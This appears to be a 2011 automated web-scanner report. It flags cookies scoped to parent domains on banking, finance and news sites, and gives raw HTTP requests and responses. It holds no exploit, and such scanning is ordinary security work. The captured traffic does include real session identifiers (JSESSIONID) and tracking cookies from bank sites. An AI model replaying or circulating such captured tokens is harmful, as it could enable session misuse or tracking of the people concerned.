HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:00:19 GMT Server: Apache Set-Cookie: v1st=FBBE6C4A1C9B8436; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: itc=CAPITALONE11NZZZintmktgD4; expires=Sun, 03-Apr-2011 22:00:19 GMT; path=/; domain=.capitalone.com Set-Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; expires=Fri, 04-Mar-2011 22:00:19 GMT; path=/; domain=.capitalone.com Set-Cookie: caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; expires=Fri, 04-Mar-2011 22:00:19 GMT; path=/; domain=.capitalone.com Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:00:18 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Keep-Alive: timeout=5, max=50 Connection: Keep-Alive Content-Type: text/html; charset=ISO-8859-1 Content-Length: 39529
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"> <h ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /creditcards/gateway/ HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 02 Feb 2011 22:12:45 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponecc=channel%3DUNS%2A20090715%3Atestgroup%3Dtg11%2A20110113; path=/; domain=.capitalone.com Set-Cookie: caponesn=f5b8a110S04syM9LTU6OK7YyMrNSCvULtjIyMLA0MDc01S1JNzTUNTIwNAQiYyXrOENTY3NjAA%3D%3D; expires=Wed, 01-Jan-2020 00:00:00 GMT; path=/; domain=.capitalone.com Set-Cookie: LP_GROUP=test; path=/creditcards/; domain=www.capitalone.com Location: http://www.capitalone.com/creditcards/? Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Content-Length: 0 Connection: close Content-Type: text/html; charset=ISO-8859-1
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /scripts/thirdparty/xplus1/xp1vars.js.php HTTP/1.1 Host: www.capitalone.com Connection: keep-alive Referer: https://www.capitalone.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: BIGipServerpl_capitalone.com_443=745088266.65056.0000; v1st=FBBE6C4A1C9B8436; itc=CAPITALONE11NZZZintmktgD4; caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:00:21 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:00:20 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Keep-Alive: timeout=5, max=50 Connection: Keep-Alive Content-Type: application/x-javascript Content-Length: 125
var xp1CC = ""; var xp1zip = "0"; var xp1region = "national"; var xp1eosSet = "N"; var xp1PageName = "";
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /greenliving/bluefin-tuna-sells-for-396000.html HTTP/1.1 Host: www.care2.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="http://www.facebook.com/2008/fbml ...[SNIP]...
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
v1st=7623A989437EC784; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.chase.com Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: JPMC1.0 Date: Wed, 02 Feb 2011 22:00:30 GMT Content-length: 22894 Content-type: text/html Set-Cookie: v1st=7623A989437EC784; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA" Last-modified: Wed, 02 Feb 2011 15:05:03 GMT Etag: "596e-4d49729f" Accept-ranges: bytes Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html xmlns:xalan="http://xml.apache.org/xalan" xmlns:java="http://xml.apache.org/xslt/java" LANG="EN"><head> ...[SNIP]...
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
v1st=60B8BEB245ABF79; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /wamuwelcome3/ HTTP/1.1 Host: www.chase.com Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: JPMC1.0 Date: Wed, 02 Feb 2011 22:00:50 GMT Content-length: 14892 Content-type: text/html Set-Cookie: v1st=60B8BEB245ABF79; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA" Last-modified: Thu, 06 Jan 2011 22:25:12 GMT Etag: "3a2c-4d264148" Accept-ranges: bytes
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
v1st=5DDC70D33F22CF8D; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chasestudentloans.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /studentloans HTTP/1.1 Host: www.chasestudentloans.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Content-Length: 169 Content-Type: text/html Location: http://www.chasestudentloans.com/studentloans/ Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Cache-Control: no-cache=Set-Cookie Expires: Thu, 01 Dec 1994 16:00:00 GMT Set-Cookie: v1st=5DDC70D33F22CF8D; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chasestudentloans.com Date: Wed, 02 Feb 2011 22:16:37 GMT Connection: close
<head><title>Document Moved</title></head> <body><h1>Object Moved</h1>This document may be found <a HREF="http://www.chasestudentloans.com/studentloans/">here</a></body>
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
lsd=41jA_; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /2008/fbml HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 404 Not Found Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=41jA_; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Thu, 03 Feb 2011 01:06:40 GMT Content-Length: 11422
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /campaign/landing.php HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 302 Found Location: http://www.facebook.com/ P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: campaign_click_url=%2Fcampaign%2Flanding.php; expires=Sat, 05-Mar-2011 01:06:44 GMT; path=/; domain=.facebook.com; httponly Content-Type: text/html; charset=utf-8 Connection: close Date: Thu, 03 Feb 2011 01:06:44 GMT Content-Length: 0
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
v1st=49DB682DE70C7979; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.firstusa.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xcards4/common/weblinking/weblinking.html HTTP/1.1 Host: www.firstusa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Thu, 03 Feb 2011 01:06:46 GMT Content-length: 5936 Content-type: text/html Set-Cookie: v1st=49DB682DE70C7979; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.firstusa.com Last-modified: Thu, 16 Dec 2010 13:58:38 GMT Etag: "1730-4d0a1b0e" Accept-ranges: bytes Connection: close
<html><head><title>Important Information on Weblinking from Chase</title> <link href="http://www.bankone.com/bolStyle.css" rel="stylesheet" type="text/css"> <SCRIPT Language="javascript" TYPE="text/j ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /finance HTTP/1.1 Host: www.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /setprefs?sig=0_wmOEOqCEugI_DX4CRMM9-gOiSPQ=&suggon=2&prev=http://www.google.com/search%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dipboard%2Bsoftware HTTP/1.1 Host: www.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;
<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"> <TITLE>302 Moved</TITLE></HEAD><BODY> <H1>302 Moved</H1> The document has moved <A HREF="http://www.google.com/search?sou ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /article/food-2011-01-11-boycotting-bluefin-isnt-enough-time-to-turn-on-the-siren HTTP/1.1 Host: www.grist.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 01:15:49 GMT Server: Apache X-Powered-By: PHP/5.2.4-2ubuntu5.12 Set-Cookie: PHPSESSID=394bce86b159c0f351253ee87caa8df9; path=/ Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: exp_last_visit=981364550; expires=Fri, 03-Feb-2012 01:15:50 GMT; path=/; domain=.grist.org Set-Cookie: exp_last_activity=1296724550; expires=Fri, 03-Feb-2012 01:15:50 GMT; path=/; domain=.grist.org Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A82%3A%22%2Farticle%2Ffood-2011-01-11-boycotting-bluefin-isnt-enough-time-to-turn-on-the-siren%2F%22%3B%7D; path=/; domain=.grist.org Last-Modified: Thu, 03 Feb 2011 01:15:50 GMT Content-Type: text/html X-Cache: MISS from grist-squid02.prod.grist.org X-Cache-Lookup: MISS from grist-squid02.prod.grist.org:80 Via: 1.0 grist-squid02.prod.grist.org (squid/3.1.8) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceb ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /business/2011/jan/11/offshore-oil-industry-white-house HTTP/1.1 Host: www.guardian.co.uk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:15:50 GMT Server: Apache X-GU-jas: 07-16121 X-GU-PageRenderer: DefaultPageRenderer Content-Language: en Content-Type: text/html; charset=UTF-8 Set-Cookie: GU_MU=VFVvQnhRcjZERHdBQUNoYlFSUUFBQUJafEkxMytueWM9; path=/; domain=.guardian.co.uk; expires=Sun, 31-Jan-2021 01:15:49 GMT Set-Cookie: GU_LOCATION=dXNhOjU6dHg6NDpkYWxsYXM6Mzo2MjM6YnJvYWRiYW5kOiAzMi43ODc6LTk2Ljc5OUA0NzI1NDI3MTgzMTgzMjE1MjMzMTk3MTM1OTcyNjIyMTAxNzUyOQ==; path=/; domain=.guardian.co.uk; expires=Thu, 24-Feb-2011 01:15:49 GMT Vary: Accept-Encoding,User-Agent X-GU-httpd: 03 P3P: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONa TELa OUR IND ONLi UNI PURi NAV STA PRE LOC" Connection: close Content-Length: 98316
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" l ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.ibsnetaccess.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<HTML> <HEAD> <TITLE>FIA Card Services Net Access</TITLE> <META NAME = "Keywords" CONTENT = "FIA Card Services, FIA card services, net access, FIA Card Services Net Access, FIA card services ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /m/pages/self-directed-investing.aspx HTTP/1.1 Host: www.merrilledge.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /m/pages/zero-dollar-trades.aspx HTTP/1.1 Host: www.merrilledge.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /m/pages/home.aspx HTTP/1.1 Host: www.merrilledge.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /m/pages/merrill-edge-advisory-center.aspx HTTP/1.1 Host: www.merrilledge.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /my/charteroneinvest HTTP/1.1 Host: www.mystreetscape.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: FWS/7.0 Date: Wed, 02 Feb 2011 22:19:32 GMT P3p: CP="UNI DEM GOV FIN STA COM NAV PRE INT ONL CUR ADM DEV PSA PSD CUSi IVDi IVAi TELi CONi TAI OUR OTRi" Set-cookie: MC=ICnV^lPuGcmwLOC9l5HCSfEXjIkSAk1J2HQKA0w6IAAOywABqjMGBAAAAQAGBU1J2HQAP03; path=/; domain=.mystreetscape.com; expires=Thu, 02-Feb-2012 22:19:32 GMT Set-cookie: spc=311; path=/ Cache-control: public Set-cookie: HttpOnly Set-cookie: JSESSIONID=48E9C3976D90BB921D5C93D8E938BE52; path=/; secure Content-length: 264 Content-type: text/html Fsreqid: REQ4d49d8740a034c3a20000ecb0000aa33 Fscalleeid: ibweb311 Fselapsedtime: 9719 Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /my/citizensinvest HTTP/1.1 Host: www.mystreetscape.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: FWS/7.0 Date: Wed, 02 Feb 2011 22:19:32 GMT P3p: CP="UNI DEM GOV FIN STA COM NAV PRE INT ONL CUR ADM DEV PSA PSD CUSi IVDi IVAi TELi CONi TAI OUR OTRi" Set-cookie: MC=^dlv6nLB_DEtlMTGowZrrNRWb_gSAk1J2HQKA0w6IAAO3QABqjMGBAAAAQAGBU1J2HQAP03; path=/; domain=.mystreetscape.com; expires=Thu, 02-Feb-2012 22:19:32 GMT Set-cookie: spc=321; path=/ Cache-control: public Set-cookie: HttpOnly Set-cookie: JSESSIONID=7117D3482F67F60B23716F580E8C6714; path=/; secure Content-length: 259 Content-type: text/html Fsreqid: REQ4d49d8740a034c3a20000edd0000aa33 Fscalleeid: ibweb321 Fselapsedtime: 9769 Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /alservlet/ForgotUserIdServlet HTTP/1.1 Host: www.onlinebanking.pnc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /alservlet/OnlineBankingServlet HTTP/1.1 Host: www.onlinebanking.pnc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd"> <html> <head> <title>PNC Bank Online Banking</title> <meta http-equiv="Expires" content=" ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /IRA/pages/home.aspx HTTP/1.1 Host: www.retirement.merrilledge.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /TotalMerrill/pages/home.aspx HTTP/1.1 Host: www.totalmerrill.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.viglink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate Content-Language: en Content-Type: text/html;charset=UTF-8 Date: Wed, 02 Feb 2011 23:45:27 GMT Expires: -1 Pragma: no-cache Set-Cookie: vglnk.Agent.p=38d8b11a817b037b4b6a4f8ea1982e0a; Domain=.viglink.com; Expires=Sat, 30-Jan-2021 23:45:27 GMT; Path=/ Set-Cookie: JSESSIONID=850E1DB3E66B214055AFE3AAEB898474; Path=/ Vary: Accept-Encoding Connection: Close Content-Length: 14626
<!doctype html> <html lang="en" xmlns:og="http://opengraphprotocol.org/schema/"> <head> <title>Affiliate Every Link on the Web with VigLink</title>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.wachovia.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="https://www.wachovia.co ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /news/26551757/detail.html HTTP/1.1 Host: www.wcti12.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html class="no-js"> <head><META http-equiv="Content-Type" content="text/html; charset=iso-8859-1 ...[SNIP]...
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
v1st=EF949CC12A6233AB; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.wellsfargo.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.wellsfargo.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Moved Temporarily Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:00:54 GMT Content-length: 0 Content-type: text/html Set-Cookie: v1st=EF949CC12A6233AB; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.wellsfargo.com Location: https://www.wellsfargo.com/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.wellsfargo.com Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=EF949CC12A6233AB
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /about/diversity/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:27 GMT Content-length: 8581 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=FY7dNJhH8RGtvgN8pvr6lX4lzZGNk421hDYK0F55Yk6vq3xThh62!-1136720127; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=1760844554.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>About Wells Fargo - Diversity ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /autoloans/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:48 GMT Content-length: 11460 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=KwsQNJhcppJbXh2HGTsl1xSTLrXLWgsZLDGy5r0NvKM6nG1NGQ1j!349572437; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2582928138.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
